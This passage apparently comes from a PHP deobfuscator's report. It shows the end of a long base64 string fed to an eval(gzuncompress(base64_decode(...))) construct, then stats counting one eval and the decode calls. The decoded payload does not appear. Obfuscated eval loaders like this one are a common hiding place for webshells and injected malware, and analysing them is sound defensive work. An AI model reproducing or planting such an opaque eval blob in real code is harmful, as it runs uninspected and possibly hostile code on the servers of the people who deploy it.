3SPy6mW7+4/dEfGyekdEw6/eb/Wv3mcQTLLqHSgopbjiIqus1uILq2eSK4ZPmyxAr4gurDLzm2Kq5G2Bt2mIGHz4AleHzKZ4pU5nWyISuu1rpPCXOqLl6ds5MjmZmcC/QD1aQna0xG+OSbvfb2frXBZknx+Nyy8Ks576S2P0mwb4sFV/hxe3bMewY+NgaOSLcIif0CN08kXzRBplF8d0YdUOimFqfWltXf9wQ97oDC75N8Pg3yf9fit3BmANIDe8T74EaBkR8zJB19llJ/+5uLxq32R3mlxXrkepF308ubxs33SJkER/dQUGoAXqp+k6xQ009e5gS9CTK0FO832fgA+9Y3LRuUxIwgKADv1RtV/6EhbsBPT5q9t91CA4N3nfafnQrmJkLEVIoGH08AnJ1ATfRzRk3xy3daa2Xdxesq255YTmks4/wJRdkfMPVxfkcyHqM+mQz4Wgzzvkc7GoQ3QcWJBAT/FLps+kS349effL2SVQ2lRhg+CZWqCnmY9BJt5D0sLi79uke9SqzgkMvXdDfoPYbQITEKRhRHZ2iJL34OUJjQRsdpJ4WQVMRT4U1KtvsvHUbjj6B0ZoMDg9pjXDeSPSwI/aipzCGkkgsWJo/T65nGItOfF9opeHvKdRSoPgHipfjCQZvMS5a1KVh3LoyyOvqNGJlvoLDA0b0faky3X3waR177daNZmZF2j1+9k3T/our5+S+zDg0W2nXRTjkLNJKC78qZIbvsF6JKcBsXydSvWXB7W2HggLwB7q3gN0J5/Q34S8XcwlOA415cnCanHAD1u5+8/vMqu1qy+kiGkgLmmkxOnrvj6I4J0IrdI15xH9UESwA5nzjyzJJ2/eLbG349PXoNgQexDEnb7utEBDwFsfQJAwKKXBAZB6Qd8flUYfg7QKET51UNZjn9C6PHt39uaKcD93Kl4wRPPInQpayXG++EWPuO+PcHcCab2XY3TeV9nekmlnjlJcb2EIvt69gT8LC9Z1L8h+zYSxv72XHuyMiqESdxZ2B38xdslcCn6u3lxm1Jt1PXrYqrY/pdGEfSy2MuRUG69Obu8l7OFX4i0+hpAD95adu7FVPmxlrN7ipTeVymeE/ZTHVq2JZDHRCNJ0f9xRg7hP58OT0/fnH9aLLFDGYt9/fP/206ZuAsRUIG7ca8UhYK2wY3wlPB5KNuH4ELH26scrXrUGPKpI/TLDJTlNjZUtYlyHKBqsas6u5YW81RPWe31y+gn8TH3OtsZppLezhgg2s7usPLuEcRFqwjkjv28RTynQ3r+aceXNZBXoaqmAy5+sSBYcPMWsZWXf8ffBtVuQJpLGUwv8FHycX+LXjBh8aT+ZatR803DphPXxG32GX+kbz1I23sQYn9CAhcZomvr88eKuRr9nl5f8EfrhsVLlN3jiNgFx70zNCt16++7i9ck7Uh69K96/KLpG/A0cVY7RpVf2An0qjtPaJZ15C3VuxbsrkXrTEge2qgQ+FdVp9/Z2yT2jEgM3XVK7fLIczuNDzHbAoomawobxtLxBDQ7XpH5Do8TdotM+wSn6Lx7N8wKKBX9WCnax4Fm73ECggyCqrfJjFhxkYWI4FO0ewX8vSN48fPjhh9o2CcT+se7KNXa5s7tD8oMWFHVJD/YgUtvYJFOpjDQR12/hblIZkN5tQjbmO+D0pq+KmvdFqsjff5MZnNYNaL2LR7y3Z1fEsrkjOAtNq5+rty+WJfWgqj9V1PNYkixXZc9XlYBmbzrmEbR58u5dzZ/+DzAW50Y=')));
?>Function Calls
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | 1173ce8736c42d0d32c27937be9f2541 |
| Eval Count | 1 |
| Decode Time | 49 ms |